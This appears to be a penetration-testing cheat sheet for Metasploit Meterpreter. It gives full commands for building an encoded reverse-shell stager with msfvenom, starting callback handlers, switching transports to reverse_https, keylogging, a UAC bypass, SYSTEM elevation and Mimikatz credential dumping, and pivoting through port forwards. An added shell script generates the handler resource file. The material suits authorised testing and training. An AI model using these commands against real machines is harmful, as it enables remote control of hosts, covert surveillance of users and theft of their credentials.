Creating a Session

To create a session, a Meterpreter payload must be executed on the target machine and must be able to reach a listener on the attacker machine. The callback from a Meterpreter payload is received by exploit/multi/handler.

First generate a Meterpreter reverse shell payload and upload it to the target. Replace $IP and $PORT with the address and port the handler will listen on.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=$IP LPORT=$PORT -f exe -o x.exe

On the attacker machine, start the handler in msfconsole before the payload is executed. See the advanced section for encoding the stager.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $IP
set LPORT $PORT
set EXITFUNC thread
set AutoRunScript post/windows/manage/migrate # Windows only
run -j # -j runs the handler as a background job; use jobs to list jobs and jobs -i ID for details of one

Use Automigration on Windows!

The session lives inside the process that executed the payload. If Meterpreter is embedded in a binary (e.g. with shellter) or injected through a stack-based exploit, the session dies as soon as that process or thread exits. Migrating into a long-lived process prevents this. To migrate automatically as soon as the session opens, run set AutoRunScript post/windows/manage/migrate in the handler before run; otherwise migrate manually with migrate PID.

Run the uploaded shell executable on the vulnerable host.

Start-Process x.exe
# or
.\x.exe

The Meterpreter session should appear in the Metasploit console shortly afterwards.

Transport

Meterpreter allows the transport (the protocol used between the session and the handler, e.g. reverse_tcp or reverse_https) to be changed at runtime. A handler for the new transport must be listening before the switch, otherwise the session is lost.

meterpreter> transport list
# the session's transport list is displayed; assume the only entry is reverse_tcp
meterpreter> transport add -t reverse_https -l 192.168.119.131 -p 5555
meterpreter> background
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_https
msf> set LHOST 192.168.119.131
msf> set LPORT 5555
msf> run -j
msf> sessions -i 1
meterpreter> transport next
# the session switches to the next transport in its list and the current session closes
msf>
# wait for the callback on the reverse_https handler...
# new session created
# stage sent
msf> sessions -i 2
meterpreter>
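The session-creation steps above (msfvenom stager, handler with automigration) and the transport switch in this section are easy to script as a Metasploit resource file. The shell script below is an added example, not part of the original notes or of Metasploit itself. It validates LHOST and the ports, prints the msfvenom command for the stager, and writes a resource script that starts the reverse_tcp handler plus a reverse_https handler, both with ExitOnSession false so that they keep listening after the first session and transport add followed by transport next has somewhere to land. The address 192.168.119.131, ports 4444/5555 and the file names are assumptions; the validator accepts only IPv4 literals, not interface names such as tun0 (which msfconsole itself accepts); msfvenom and msfconsole are printed, never executed, by this script.

```sh
#!/bin/sh
# Added example, not part of the original notes: build the handler resource
# script and the msfvenom command for the session-creation + transport steps.
# Assumes POSIX sh; msfvenom/msfconsole are only printed here, never executed.
set -eu

# valid_ipv4 ADDR: true if ADDR is a dotted-quad IPv4 address (octets 0-255).
valid_ipv4() {
  case "$1" in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  n=0
  rest="$1."
  while [ -n "$rest" ]; do
    o="${rest%%.*}"
    rest="${rest#*.}"
    [ "${#o}" -le 3 ] && [ "$o" -le 255 ] || return 1
    n=$((n + 1))
  done
  [ "$n" -eq 4 ]
}

# valid_port PORT: true if PORT is an integer in 1..65535.
valid_port() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# msfvenom_cmd LHOST LPORT OUT: print the command that builds the x86
# reverse_tcp stager (same options as the notes above).
msfvenom_cmd() {
  printf 'msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=%s LPORT=%s -f exe -o %s\n' "$1" "$2" "$3"
}

# write_handler_rc LHOST TCP_PORT HTTPS_PORT OUT_RC: write a resource script
# that starts two background handler jobs:
#   - reverse_tcp on TCP_PORT, running post/windows/manage/migrate on connect
#   - reverse_https on HTTPS_PORT, the target of `transport add`/`transport next`
# ExitOnSession false keeps both jobs listening after the first session opens,
# which the transport switch relies on (the switched session arrives as a new one).
write_handler_rc() {
  valid_ipv4 "$1" || { echo "write_handler_rc: bad LHOST '$1'" >&2; return 1; }
  valid_port "$2" || { echo "write_handler_rc: bad TCP port '$2'" >&2; return 1; }
  valid_port "$3" || { echo "write_handler_rc: bad HTTPS port '$3'" >&2; return 1; }
  [ "$2" != "$3" ] || { echo "write_handler_rc: handler ports must differ" >&2; return 1; }
  cat > "$4" <<EOF
# generated by write_handler_rc; start with: msfconsole -q -r $4
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set EXITFUNC thread
set ExitOnSession false
set AutoRunScript post/windows/manage/migrate
run -j
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $1
set LPORT $3
set ExitOnSession false
set AutoRunScript post/windows/manage/migrate
run -j
EOF
}

# Usage: sh gen_handler.sh LHOST TCP_PORT HTTPS_PORT [OUT_RC]
# e.g.   sh gen_handler.sh 192.168.119.131 4444 5555 handler.rc   (assumed values)
# With fewer than three arguments only the functions are defined, so the
# file can be sourced.
if [ "$#" -ge 3 ]; then
  rc="${4:-handler.rc}"
  write_handler_rc "$1" "$2" "$3" "$rc"
  echo "1) build the stager on the attacker machine:"
  msfvenom_cmd "$1" "$2" x.exe
  echo "2) start both handlers: msfconsole -q -r $rc"
  echo "3) run x.exe on the target, then in the session:"
  echo "   transport add -t reverse_https -l $1 -p $3 ; transport next"
fi
```

The script only prepares the commands and the resource file; run the printed msfvenom line and msfconsole -q -r handler.rc yourself. Without ExitOnSession false the reverse_https job would exit after its first session and a later transport next would have nothing to connect to.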

Meterpreter Usage

General

  • sysinfo: gather basic info about the remote machine (hostname, OS, architecture, domain)
  • shell: spawn an interactive command shell (cmd.exe on Windows) on the target

File Transfer

  • upload LOCAL REMOTE: upload file to remote machine
  • download REMOTE LOCAL: download file to local machine

Peeping

Note that these commands run in the context of the process hosting the session, i.e. under that process's user and desktop. To capture a logged-on user's screen or keystrokes, migrate into a process on that user's desktop (e.g. explorer.exe) first.

  • screenshot: captures a screenshot
  • keyscan_start to start keylogging
  • keyscan_dump to dump current keylog results
  • keyscan_stop to stop keylogging

Process Management & Migration

  • ps: list processes
  • migrate PID: migrate into process PID. The current session must be able to open the target process, which in practice means a process running as the same user at the same or lower integrity level; migrating into a process owned by another user or SYSTEM requires SYSTEM or SeDebugPrivilege.

Post-exploitation Modules

Using a Windows UAC bypass as an example (this one works on the Fall Creators Update at least). UAC bypasses need an existing medium-integrity session as a user who is a member of the local Administrators group.

msf> use exploit/windows/local/bypassuac_injection_winsxs
msf> show targets
# 0 -> Windows x86
# 1 -> Windows x64
msf> set TARGET 1
msf> set SESSION 1 # ID of an existing meterpreter session (see sessions -l)
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST tun0
msf> set LPORT 4455
msf> run # on success a new high-integrity meterpreter session calls back to LPORT

Extensions

  • load EXTENSION: load a given extension
  • load powershell: load the PowerShell extension
    • powershell_execute "$PSVersionTable.PSVersion": get the PS version
  • load kiwi: load Mimikatz (the Meterpreter architecture must match the OS, so use an x64 Meterpreter on 64-bit Windows)
    • getsystem: a built-in priv command rather than part of kiwi; tries to elevate to SYSTEM from a high-integrity session. Run it before the kiwi commands, which need SYSTEM to read LSASS
    • creds_msv: dump MSV (NTLM hash) credentials

Pivoting

  • portfwd add -l LOCAL -p REMOTE -r REMOTE_IP: listen on port LOCAL of the attacker machine and forward connections through the session to port REMOTE on REMOTE_IP, as reachable from the compromised host. Tools on the attacker machine then target 127.0.0.1:LOCAL; portfwd list shows active forwards.